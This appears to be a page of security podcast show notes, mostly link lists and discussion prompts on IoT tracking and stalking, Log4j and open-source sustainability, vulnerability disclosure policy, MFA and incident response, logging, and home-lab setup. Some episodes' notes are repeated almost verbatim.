“For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems,” said Kent Walker, chief legal officer at Google in a blog post published after the meeting. “But in fact, while some projects do have many eyes on them, others have few or none at all.”
Show was inspired by this Twitter conversation:
https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19
https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19
IOT architecture (https://www.avsystem.com/blog/iot-ecosystem/)
Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/
Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways
Gateways -
Devices -
Mobile apps -
SDKs -
integrations
Cloud services DO go offline, point of failure:
https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/
Connectivity and sharing mesh networks assumes you like your neighbors.
Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf
network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/
Stalking/privacy vs. tracking/surveillance
Fine GPS locations
Nearby devices triangulate (via BLE, wifi, or 900mhz)
We want to find our lost devices, but devices can be used for stalking
https://www.autoevolution.com/news/police-claim-apple-has-unwillingly-created-the-most-convenient-stalking-device-179228.html
Just have an iPhone and you’ll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone)
What do companies want with that information?
What is a ‘happy medium’ to allow you to find your dog, but not to track people?
Device controls? Buzzers? (how loud can you make a noise in a small device?) Size issues, battery life, beaconing, self-identification (“Hi, I am a lost device…”)
Is what Airtags doing enough to reduce the fear?
Are we designing to edge cases? There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile)
How often do you lose your keys? Why is your dog not on a leash or properly trained?
What will it take to make these kinds of devices more secure?
https://spectrum.ieee.org/why-iot-sensors-need-standards
Will it take privacy protections to motivate IoT devices to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified?
Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf
https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs
Threat modeling, vulnerabilities in IoT networks and platforms
Does your Iot Platform give out SDKs for integrations or allowing 3rd party products or apps? https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
https://www.avsystem.com/blog/iot-ecosystem/
Old and outdated libraries, like TCP vulnerabilities (RIPPLE20)
https://www.businessinsider.com/iot-security-privacy
https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/
https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh
Networks: A Survey
https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/
https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK
Opt-out of Amazon sidewalk
Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure
Fetch:
As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet’s collar and help ensure they’re safe. If your dog wanders outside a perimeter you’ve set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Sidewalk network will provide customers with even more capabilities like real-time location information, helping you quickly reunite with your lost pet. For device makers, Fetch also serves as a reference design to demonstrate the potential that devices connected to a broad, reliable network can provide to their customers.
https://www.aboutamazon.com/news/devices/introducing-amazon-sidewalk
Published on: January 24, 2022
Amélie Koran and Adam Baldwin discuss OSS sustainability, supply chain security,, governance, and outreach for popular applications - part2
Adam Baldwin (@adam_baldwin)
Amélie Koran (@webjedi)
https://logging.apache.org/log4j/2.x/license.html
https://www.theregister.com/2021/12/14/log4j_vulnerability_open_source_funding/
https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/
F/OSS developer deliberately bricks his software in retaliation for big companies not supporting OSS.
https://twitter.com/BleepinComputer/status/1480182019854327808
Faker.js - https://www.npmjs.com/package/faker Generate massive amounts of fake contextual data
Colors.js - https://www.npmjs.com/pafaker - npm package/colors get color and style in your node.js console
https://abc7ny.com/suspicious-package-queens-astoria-fire/6425363/
Should OSS teams expect payment for giving their time/code away for free? What are their expectations
Should open source projects be aware of how popular they are? What happens when they reach a certain level of popularity?
OSS Sustainability - https://github.blog/2019-01-17-lets-talk-about-open-source-sustainability/
https://webjedi.net/2022/01/03/security-puppy/
Apparently, “Hobbyists” were the bane of a young Bill Gates: (can you https://en.wikipedia.org/wiki/Open_Letter_to_Hobbyists
https://en.wikipedia.org/wiki/History_of_free_and_open-source_software
History of open source
Licensing Overview: https://youtu.be/Eu_GvrSlShI (this was a talk I gave for Splunk on this --AK)
https://libraries.io/
Libraries.io monitors 5,039,738 open source packages across 32 different package managers, so you don't have to.
Published on: January 18, 2022
OSS sustainability, log4j fallout, developer damages own code-p1
Adam Baldwin (@adam_baldwin)
Amélie Koran (@webjedi)
Log4j vulnerability
https://logging.apache.org/log4j/2.x/license.html
https://www.theregister.com/2021/12/14/log4j_vulnerability_open_source_funding/
https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/
F/OSS developer deliberately bricks his software in retaliation for big companies not supporting OSS.
https://twitter.com/BleepinComputer/status/1480182019854327808
Faker.js - https://www.npmjs.com/package/faker Generate massive amounts of fake contextual data
Colors.js - https://www.npmjs.com/pafaker - npmckage/colors get color and style in your node.js console
https://abc7ny.com/suspicious-package-queens-astoria-fire/6425363/
Should OSS teams expect payment for giving their time/code away for free? What are their expectations
Should open source projects be aware of how popular they are? What happens when they reach a certain level of popularity?
OSS Sustainability - https://github.blog/2019-01-17-lets-talk-about-open-source-sustainability/
https://webjedi.net/2022/01/03/security-puppy/
Apparently, “Hobbyists” were the bane of a young Bill Gates: (can you https://en.wikipedia.org/wiki/Open_Letter_to_Hobbyists
https://en.wikipedia.org/wiki/History_of_free_and_open-source_software
History of open source
Licensing Overview: https://youtu.be/Eu_GvrSlShI (this was a talk I gave for Splunk on this)
- Libraries.io monitors 5,039,738 open source packages across 32 different package managers, so you don't have to.
Published on: January 12, 2022
2021-046-Mick Douglas, Log4j vulnerabilities, egress mitigations- part2
Introduction
Overview of Log4j vuln (as of 16 December 2021)
Why is it a big deal? (impact/criticality/risk)
Talk about patching vs. mitigation
why wasn’t this given the same visibility in 2009? Because it’s Oracle or Java?
Good callout is building slides to brief org leadership, detections, and other educational tools.
Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue)
Are there other technologies like log4j that prop up the entire world, and we just don’t know?
Egress traffic (discussed at length on twitter, what problems it solve?)
https://twitter.com/mubix/status/1470430085169745920
Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - apache removed JDNI functionality
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/ <- great aggregation
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313
Lots of discussion about “SBOM solving the issue”. @K8em0 weighs in https://twitter.com/k8em0/status/1469437490691932164
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 -list of advisories for log4j
Mitigation: https://twitter.com/brunoborges/status/1469186875608875011
https://twitter.com/DannyThomas/status/1469709039911129088 (holy hell, 2009?!?)
2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable
https://bugzilla.redhat.com/show_bug.cgi?id=1639834
OpenJDK…
https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20
You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue.
1) visit https://canarytokens.org;
2) choose the Log4shell token;
3) enter the email address you wish to be notified at;
4) copy/use the returned string...
Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130
The #Log4Shell attack vector was known since 2016…
https://twitter.com/bettersafetynet/status/1469470284977745932
Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread.
When dealing with attacks like this you should remember the acronym IMMA.
I = Isolate
M = Minimize
M = Monitor
A = Active Defense
https://github.com/MarkBaggett/srum-dump
“SRUM Dump extracts information from the System Resource Utilization Management Database and creates a Excel spreadsheet.
The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations!
To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS).
This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications.
If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind.”
Published on: December 23, 2021
2021-045-Mick Douglas, Log4j vulnerabilities, egress mitigations- part1
Introduction
Overview of Log4j vuln (as of 16 December 2021)
Why is it a big deal? (impact/criticality/risk)
Talk about patching vs. mitigation
why wasn’t this given the same visibility in 2009? Because it’s Oracle or Java?
Good callout is building slides to brief org leadership, detections, and other educational tools.
Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue)
Are there other technologies like log4j that prop up the entire world, and we just don’t know?
Egress traffic (discussed at length on twitter, what problems it solve?)
https://twitter.com/mubix/status/1470430085169745920
Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - apache removed JDNI functionality
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/ <- great aggregation
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313
Lots of discussion about “SBOM solving the issue”. @K8em0 weighs in https://twitter.com/k8em0/status/1469437490691932164
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 -list of advisories for log4j
Mitigation: https://twitter.com/brunoborges/status/1469186875608875011
https://twitter.com/DannyThomas/status/1469709039911129088 (holy hell, 2009?!?)
2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable
https://bugzilla.redhat.com/show_bug.cgi?id=1639834
OpenJDK…
https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20
You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue.
1) visit https://canarytokens.org;
2) choose the Log4shell token;
3) enter the email address you wish to be notified at;
4) copy/use the returned string...
Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130
The #Log4Shell attack vector was known since 2016…
https://twitter.com/bettersafetynet/status/1469470284977745932
Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread.
When dealing with attacks like this you should remember the acronym IMMA.
I = Isolate
M = Minimize
M = Monitor
A = Active Defense
https://github.com/MarkBaggett/srum-dump
“SRUM Dump extracts information from the System Resource Utilization Management Database and creates a Excel spreadsheet.
The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations!
To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS).
This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications.
If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind.”
Published on: December 16, 20212021-044-Litmoose discusses stalking and protecting yourself
New $3 patron! 🎉Thank you John K.!
- National Domestic Violence Hotline at 1-800-799-7233, or by online chat.
- National Sexual Assault Hotline at 1-800-656-4673, or by online chat.
https://www.stalkingawareness.org/wp-content/uploads/2019/01/SPARC_StalkngFactSheet_2018_FINAL.pdf
TALKING VICTIMIZATION
An estimated 6-7.5 million people are #stalked in a one year period in the United States.
Nearly 1 in 6 women and 1 in 17 men have experienced stalking victimization at some point in their lifetime.
Using a less conservative definition of stalking, which considers any amount of fear (i.e., a little fearful, somewhat fearful, or very fearful), 1 in 4 women and 1 in 13 men reported being a victim of stalking in their lifetime.
About half of all victims of stalking indicated that they were stalked before the age of 25.
Stalkers use many tactics including:
Approaching the victim or showing up in places when the victim didn’t want them to be there;
making unwanted telephone calls; leaving the victim unwanted messages (text or voice);
watching or following the victim from a distance
spying on the victim with a listening device, camera, or #GPS. (or #IOT device)
https://www.vice.com/en/article/d3akpk/smart-home-technology-stalking-harassment
https://www.ucl.ac.uk/steapp/sites/steapp/files/giot-report.pdf - Tech Abuse Gender and IoT Research Report
https://www.researchgate.net/publication/260867980_TRAPPED_TECHNOLOGY_AS_A_BARRIER_TO_LEAVING_AN_ABUSIVE_RELATIONSHIP
Center to End Technical #Abuse (CETA) https://www.ceta.tech.cornell.edu/resources
https://82beb9a6-b7db-490a-88be-9f149bafe221.filesusr.com/ugd/c4e6d5_20fe31daffd74b2fb4b4735d703dad6a.pdf -disconnect checklist
Tw: stalking resulting in death:
A pattern of fixation and obsession’: How the #pandemic exacerbated stalking cases in the UK
https://www.independent.co.uk/life-style/women/stalking-cases-pandemic-gracie-spinks-b1956589.html
https://pathwaystosafety.org/staying-safe/
https://www.techsafety.org/
https://static1.squarespace.com/static/51dc541ce4b03ebab8c5c88c/t/61674c082419497a370af990/1634159630368/2021_T2E+Needs+Assessment+Report.pdf
“Smart” or connected devices often referred to as the Internet of Things (IoT) turn up in cases “all the time” or “often” for a third of advocates and 1 in 5 #legal systems professionals. While this is rather low, people are increasingly using these types of technology. With additional use we may see increases in abuse through them. Additionally, advocates and legal systems professionals are often not aware of how these technologies can be misused, so they may not ask about them.
Published on: December 13, 20212021-043- Fred Jennings, Vuln Disclosure policy, VEP, and 0day disclosure - p2
https://twitter.com/Esquiring - Fred Jennings
Vulnerabilities Equity program (VEP), vuln disclosure program (VDP), and what is the a way for disclosure of 0day? (‘proper’ is different and dependent)
This show was inspired by this Tweet thread from @k8em0 and @_MG_
https://twitter.com/k8em0/status/1459715464691535877
https://twitter.com/_MG_/status/1459718518346174465
Legal Safe Harbor? Copy-left for security researchers…?
What is a VEP? Not a new concept (2014)
Context: Was written when Heartbleed came out.
About transparency, but within reason
From the blogpost:
“We have also established a disciplined, rigorous and high-level decision-making process for vulnerability disclosure. This interagency process helps ensure that all of the pros and cons are properly considered and weighed. While there are no hard and fast rules, here are a few things I want to know when an agency proposes temporarily withholding knowledge of a vulnerability:
How much is the vulnerable system used in the core internet infrastructure, in other critical infrastructure systems, in the U.S. economy, and/or in national security systems?
Does the vulnerability, if left unpatched, impose significant risk?
How much harm could an adversary nation or criminal group do with knowledge of this vulnerability?
How likely is it that we would know if someone else was exploiting it?
How badly do we need the intelligence we think we can get from exploiting the vulnerability?
Are there other ways we can get it?
Could we utilize the vulnerability for a short period of time before we disclose it?
How likely is it that someone else will discover the vulnerability?
Can the vulnerability be patched or otherwise mitigated?”
Gov orgs involved in VEP: https://en.wikipedia.org/wiki/Vulnerabilities_Equities_Process
Assessing the Vulnerabilities Equities Process, Three Years After the VEP Charter
Companies have VEP (every time they issue a patch), but they aren’t always transparent about it. Embargoes a plenty. https://www.redhat.com/en/blog/security-embargoes-red-hat
https://xenproject.org/developers/security-policy/ (creates a caste system of ‘haves and not-haves’... important vs. not important) bad guys will target people not on the inside.
0day benefit from non-transparent VEP. https://www.randori.com/blog/why-zero-days-are-essential-to-security/
Randori had 365day… https://twitter.com/_MG_/status/1459024603263557633
https://twitter.com/JimSycurity/status/1459152870490574854
Preferred patch 8.1.17, issued october 2020
VEP does not always have to be 0day… can be solutions to issues: https://www.techdirt.com/articles/20210922/17095747614/fbi-sat-ransomware-decryption-key-weeks-as-victims-lost-millions-dollars.shtml
“The FBI refrained for almost three weeks from helping to unlock the computers of hundreds of businesses and institutions hobbled by a major ransomware attack this summer, even though the bureau had secretly obtained the digital key needed to do so, according to several current and former U.S. officials.
The key was obtained through access to the servers of the Russia-based criminal gang behind the July attack. Deploying it immediately could have helped the victims, including schools and hospitals, avoid what analysts estimate was millions of dollars in recovery costs.
In a perfect world, what does disclosure look like?
Communication (easy, secure, detailed… pick 1)
Separating wheat from chaff - ‘lol, i got root, pay me plz’
Fear of NDAs and gag clauses
Do people expect to be paid?
Setup of a ‘cheap’ program? What if you don’t have a budget to pay out (or more accurately, mgmt won’t pay out)? People won’t disclose? Should you pay? Use a 3rd party?
Published on: November 21, 20212021-042- Fred Jennings, VDP, Vuln Equity, And 0day disclosure - p1
https://twitter.com/Esquiring - Fred Jennings
Vulnerabilities Equity program (VEP), vuln disclosure program (VDP), and what is the best way for disclosure of 0day? (‘proper’ is different and dependent)
This show was inspired by this Tweet thread from @k8em0 and @_MG_
https://twitter.com/k8em0/status/1459715464691535877
https://twitter.com/_MG_/status/1459718518346174465
Legal Safe Harbor? Copy-left for security researchers…?
What is a VEP? Not a new concept (2014)
Context: Was written when Heartbleed came out.
About transparency, but within reason
From the blogpost:
“We have also established a disciplined, rigorous and high-level decision-making process for vulnerability disclosure. This interagency process helps ensure that all of the pros and cons are properly considered and weighed. While there are no hard and fast rules, here are a few things I want to know when an agency proposes temporarily withholding knowledge of a vulnerability:
How much is the vulnerable system used in the core internet infrastructure, in other critical infrastructure systems, in the U.S. economy, and/or in national security systems?
Does the vulnerability, if left unpatched, impose significant risk?
How much harm could an adversary nation or criminal group do with knowledge of this vulnerability?
How likely is it that we would know if someone else was exploiting it?
How badly do we need the intelligence we think we can get from exploiting the vulnerability?
Are there other ways we can get it?
Could we utilize the vulnerability for a short period of time before we disclose it?
How likely is it that someone else will discover the vulnerability?
Can the vulnerability be patched or otherwise mitigated?”
Gov orgs involved in VEP: https://en.wikipedia.org/wiki/Vulnerabilities_Equities_Process
Assessing the Vulnerabilities Equities Process, Three Years After the VEP Charter
Companies have VEP (every time they issue a patch), but they aren’t always transparent about it. Embargoes a plenty. https://www.redhat.com/en/blog/security-embargoes-red-hat
https://xenproject.org/developers/security-policy/ (creates a caste system of ‘haves and not-haves’... important vs. not important) bad guys will target people not on the inside.
0day benefit from non-transparent VEP. https://www.randori.com/blog/why-zero-days-are-essential-to-security/
Randori had 365day… https://twitter.com/_MG_/status/1459024603263557633
https://twitter.com/JimSycurity/status/1459152870490574854
Preferred patch 8.1.17, issued october 2020
VEP does not always have to be 0day… can be solutions to issues: https://www.techdirt.com/articles/20210922/17095747614/fbi-sat-ransomware-decryption-key-weeks-as-victims-lost-millions-dollars.shtml
“The FBI refrained for almost three weeks from helping to unlock the computers of hundreds of businesses and institutions hobbled by a major ransomware attack this summer, even though the bureau had secretly obtained the digital key needed to do so, according to several current and former U.S. officials.
The key was obtained through access to the servers of the Russia-based criminal gang behind the July attack. Deploying it immediately could have helped the victims, including schools and hospitals, avoid what analysts estimate was millions of dollars in recovery costs.
In a perfect world, what does disclosure look like?
Communication (easy, secure, detailed… pick 1)
Separating wheat from chaff - ‘lol, i got root, pay me plz’
Fear of NDAs and gag clauses
Do people expect to be paid?
Setup of a ‘cheap’ program? What if you don’t have a budget to pay out (or more accurately, mgmt won’t pay out)? People won’t disclose? Should you pay? Use a 3rd party?
Published on: November 21, 2021Blumira Sponsor #3 - Emily Eubanks, more actionable events, incident response help, and more
In this sponsored BDS episode, Bryan Brake and Amanda Berlin interview Emily Eubanks, a Security Operations Analyst for #Blumira. We discuss common business risks like IT staff turnover, a lack of Incident Response procedures, choosing not to follow PowerShell best practices, and MFA use for critical or sensitive applications. We also discuss ways to improve security posture to mitigate these risks as well as how Blumira can help organizations in light of these common business challenges.
ADDITIONAL RESOURCES
OUR REDDIT AMA
https://www.reddit.com/r/cybersecurity/comments/qao73j/we_are_a_security_team_with_20_years_of_ethical/
MFA
https://attack.mitre.org/mitigations/M1032/
https://techcommunity.microsoft.com/t5/azure-active-directory-identity/your-pa-word-doesn-t-matter/ba-p/731984
https://www.yubico.com/blog/otp-vs-u2f-strong-to-stronger/
INCIDENT RESPONSE
https://www.nist.gov/cyberframework/respond
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
POWERSHELL BEST PRACTICES
https://www.blumira.com/analysis-of-a-threat-powershell-malicious-activity/
https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/learn-script-security
https://devblogs.microsoft.com/powershell/secrets-management-module-vault-extensions/
https://www.reddit.com/r/PowerShell/comments/g3b9h5/how_are_you_managing_secrets/
RISK: A lack of MFA where available or using SMS based MFA for critical applications.
Please do not use SMS based MFA for critical applications. [6] [7]
This is an easy layer of defense that has historically been very effective [5]
One-Time Passwords (OTP) good but [8] FIDO U2F better
Consider hardware tokens (e.g. Yubico YubiKey, Google Titan Security Key).
MITIGATION:
Blumira requires use of MFA
MFA related detections (e.g. AWS, Duo)
BLUMIRA HELPS:
Incident Response Procedures
RISK: A lack of Incident Response Procedures or the decision to postpone incident response procedures because they would result in a disruption in service typically results in unfavorable outcomes.
A written plan that identifies the roles, responsibilities, and procedures that should be set in motion once an incident has been declared.
If this is overwhelming to conceptualize, know there are a good amount of free and openly available resources already in existence to help with creations of new IR plans >> I highly recommend looking at NIST documentation to get an idea of what is possible and then scale to what is appropriate for your organization [4]
The plan should be reviewed at a minimum once annually with everyone who is responsible for responding to incidents present. If anybody is unclear with their role, responsibilities or procedures then the Incident Response lead should work with them to get them there.
Incident Response procedures should be like a fire drill so that when there is a real fire, the team can work together to quickly put that fire out and minimize impact to the company and their customers. (Shoutout to the BDS podcast on drawing connections from fire fighting to Incident Response procedures with Dr. Catherine J. Ullman (@investigatorchi))
MITIGATION:
Workflows
Blumira helps with this by providing built-in guidance with workflows.
Workflows ask direct questions and provide specific options to record responses to security findings to guide practitioners towards a conclusion.
provides additional details to help operators make informed decisions in response to new findings.
Finding analysis
BLUMIRA HELPS:
Recent or Frequent IT Staff Turnover
RISK: impedes troubleshooting logflow and/or investigations due the a lack of familiarity with the network environment
Prevention might be the best solution? Giving your workers time during the work week to improve a work related skill can help identify when a team is reaching or exceeding their resource capacity. If your team is overworked they are more likely to make mistakes, will be less prepared to go the extra mile when it is needed because they’ll already be tapped out of energy, and may be more likely to consider opportunities elsewhere.
You want to limit keystone employees, meaning that if an employee leaves for whatever reason you do not want that employee’s absence to cause a breakdown in processes for others. Redundancy is best here in most cases IMO.
MITIGATION:
Blumira works hard to create fewer, more actionable findings.
We strive to keep our alerts simple to provide the information that operators need to make informed decisions.
We try to focus on findings that require action and provide workflows to provide additional guidance to help share recommendations on what to investigate next to evaluate the impact of a security event
BLUMIRA HELPS:
PowerShell Scripting Best Practices
RISK:
Detections will be less helpful if staff are frequently dismissing events in response to approved administrative behavior like maintenance scripts.
Follow the PowerShell recommendations shared by Microsoft [1] including:
Sign your scripts (lol Microsoft has this bolded by the way hint hint wink wink) “another method for keeping scripts security is vetting and signing your scripts
Do not store secrets in PoSH scripts; if you are doing this you’re gonna want to google “secrets management” [2] and learn more about how to secure store and access secrets across an enterprise environment
Briefly, there is a powershell module for vault secret extensions [3] some vault extensions include KeePass, LastPass, Hashicorp Vault, Azure KeyVault, KeyChain, and CredMan
Use a recent version of Powershell (we are on version 7, but this article recommends 5+)
Enable and collect powershell logs
MITIGATION:
Blumira detects on malicious powershell usage.
BLUMIRA HELPS:
ADDITIONAL LINKS AND SOURCES:
[1] https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/learn-script-security
[2] https://www.reddit.com/r/PowerShell/comments/g3b9h5/how_are_you_managing_secrets/
[3] https://github.com/PowerShell/SecretManagement
[3] https://devblogs.microsoft.com/powershell/secrets-management-module-vault-extensions/
[4] https://www.nist.gov/cyberframework/respond
[5] https://attack.mitre.org/mitigations/M1032/
[6] https://techcommunity.microsoft.com/t5/azure-active-directory-identity/your-pa-word-doesn-t-matter/ba-p/731984
[7] https://www.zdnet.com/article/microsoft-urges-users-to-stop-using-phone-based-multi-factor-authentication/
[8] https://www.yubico.com/blog/otp-vs-u2f-strong-to-stronger/
https://www.blumira.com/analysis-of-a-threat-powershell-malicious-activity/
2021-041-0day disclosure, Randori, FBI email server pwnage
https://securityaffairs.co/wordpress/124570/cyber-crime/fbi-hacked-email-server.html
https://www.randori.com/blog/why-zero-days-are-essential-to-security/
https://twitter.com/_MG_/status/1459024603263557633
“Hey... did anyone notice that PAN 0day was fixed in a version that was released over a year ago?
Guess it wasn't easy to notice under all the loud opinions about ethics.”
https://twitter.com/_MG_/status/1459038747807285253/photo/1
Published on: November 16, 20212021-040-Sweden's parents rebel over poor App design, US government forcing patching of systems, and Vuln chaining
News stories covered this week, as well as links of note:
https://www.wired.co.uk/article/sweden-stockholm-school-app-open-source
https://curtbraz.medium.com/a-konami-code-for-vuln-chaining-combos-1a29d0a27c2a
https://docs.google.com/presentation/d/17gISafUZzEyjV7wkdHaTQZmtxstBqECa/edit#slide=id.p4
https://www.securityweek.com/braktooth-new-bluetooth-vulnerabilities-could-affect-millions-devices
https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html
https://cyber.dhs.gov/bod/22-01/
https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Published on: November 8, 2021
2021-039-Minimum Viable vendor security sheet, Federal logging requirements, and more!
https://security.googleblog.com/2021/10/launching-collaborative-minimum.html
https://mvsp.dev/mvsp.en/index.html
https://www.standardfusion.com/blog/assessing-vendor-risk-with-questionnaires/
SPONSOR-Blumira's Nato Riley on Log Classification, Security Maturity,
From Nato’s email:
Hi Bryan,
Discussing the challenges that come with not having good logging in place could be a great topic! We could make it partly about how security maturity works, in the idea that security generally starts with awareness and visibility.
The topic sort of gets into the idea that knowing is half the battle, so logging can be transformative for helping a company properly secure themselves from online risks!
What do you think of this topic idea?
https://www.blumira.com/careers/
https://thenewstack.io/logging-and-monitoring-why-you-need-both/
https://www.sentinelone.com/blog/the-10-commandments-of-logging/
https://towardsdatascience.com/why-should-you-care-about-logging-442a195b80a1
https://www.g2.com/products/blumira-automated-detection-response/reviews#survey-response-4908309
(wouldn’t you know it… a couple additional google searches, and I find this -brbr)
https://www.executivegov.com/2021/08/omb-creates-maturity-framework-for-event-log-management/)
https://insidecybersecurity.com/sites/insidecybersecurity.com/files/documents/2021/may/cs2021_0089c.pdf
Logging maturity in the US gov (OMB policy doc): https://www.whitehouse.gov/wp-content/uploads/2021/08/M-21-31-Improving-the-Federal-Governments-Investigative-and-Remediation-Capabilities-Related-to-Cybersecurity-Incidents.pdf
Are there examples of devices that don’t give out logs? What if your vendor does not allow you to have logs? Can you create logs based on the activity of the device? What would that look like?
Types of logs:
Application logs
Network logs
Endpoint security logs
OS logs
IDS/IPS logs
Vuln scanner logs
Published on: November 1, 2021
2021-038-Liz Saling, 5 pillars of building a good team
Blog post that inspired this episode:
https://lizsaling.com/SWE-team-five-pillars/
Liz Saling (@lizsaling)
https://www.mindtools.com/pages/article/newLDR_86.htm
http://www.mspguide.org/tool/tuckman-forming-norming-storming-performing
https://michaelhyatt.com/3-roadblocks-to-avoid-for-optimal-team-performance
Erin meyer is the one who did the netflix study!
https://bigthink.com/the-present/high-performing-teams/
https://alicedartnell.com/blog/why-smart-goals-are-stupid/
NEWS:
Unlocking ‘god’ mode on windows 11: https://www.bleepingcomputer.com/news/microsoft/how-to-unlock-windows-11s-god-mode-to-access-advanced-settings/
https://www.reddit.com/r/netsec/comments/q9f63y/creating_a_basic_python_reverse_shell_listener/
NFT malware (NFTs that empty wallets): https://www.theregister.com/2021/10/17/in_brief_security/
Published on: October 25, 20212021-037-Tony Robinson, leveraging your home lab for job success - Part2
Tony Robinson (@da_667)
Thought we’d put in a little news to round out the show
https://www.bbc.com/news/world-us-canada-58863678 - nuclear secrets hidden in a peanut butter sandwich
https://www.theregister.com/2018/04/20/rsa_security_conference_insecure_mobile_app/
https://www.vice.com/en/article/jg8w9b/the-twitch-hack-is-worse-for-streamers-than-for-twitch
https://www.securityweek.com/fontonlake-linux-malware-used-targeted-attacks
Similar device on ebay: https://www.ebay.com/itm/324762812721
https://www.zdnet.com/article/brewdog-exposed-data-of-200000-shareholders-for-over-a-year/
https://tpetersonkth.github.io/cve/2021/10/02/Analysis-of-CVE-2019-9053.html
www.leanpub.com/avatar2 MSRP = $30 USD
Book changes
What is the end goal?
Upskill?
Independent consultant?
Promotion?
Bug bounties?
Lab setup -
Lab setup types
Cloud based -
Desktop/laptop/NUC -
Server -
Good VMs to
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ - 90 day WIndows machines
What other home lab equipment have would be helpful?
Testing IoT/embedded devices?
Car hacking?
Malware analysis?
https://bazaar.abuse.ch/
Virus Total Intelligence
Honeypots
@malware_traffic - https://twitter.com/malware_traffic/status/1446627364147023877
Analyzing binaries?
Patch analysis (patch tuesday, print nightmare, etc)?
https://wumb0.in/extracting-and-diffing-ms-patches-in-2020.html
https://www.netresec.com/?page=networkminer
Soldering?
Oscillators for voltage checks?
Wireless?
Old cellphones (mobile apps, don’t need cellular)
Personal assistant devices (used IoT devices?)
Accessing data stored on devices
Specific software licenses?
Burp?
If I’m trying to break into infosec, how do I use my lab to sell myself to an employer?
Does the employer care?
How can someone show what they’ve learned in a way that shows the value?
Published on: October 17, 20212021-036-Tony Robinson, twtich breach, @da_667 lab setup new book edition! -part1
Tony Robinson (@da_667)
